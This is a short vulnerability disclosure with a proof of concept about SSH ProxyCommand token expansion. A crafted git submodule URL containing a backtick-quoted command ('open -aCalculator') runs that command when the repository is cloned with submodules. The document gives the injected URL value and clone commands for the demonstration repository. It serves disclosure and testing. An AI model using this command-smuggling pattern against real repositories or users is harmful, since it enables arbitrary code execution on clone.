Use of tokens like %h, %p in ProxyCommand
is quite popular to use tunnels and connection proxying using SSH.
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Note: in my initial assessment I was under the impression that using '%h` (single quotes) would avoid this, but looks like that is still going to be vulnerable with something like:
url = ssh://'`open -aCalculator`'foo.example.com/bar
Taken from: https://man.openbsd.org/ssh_config#ProxyCommand
A submodule which would exploit this vulnerability to pop a calculator on OSX.
Try it out using:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
or
git clone git@github.com:vin01/poc-proxycommand-vulnerable.git --recurse-submodules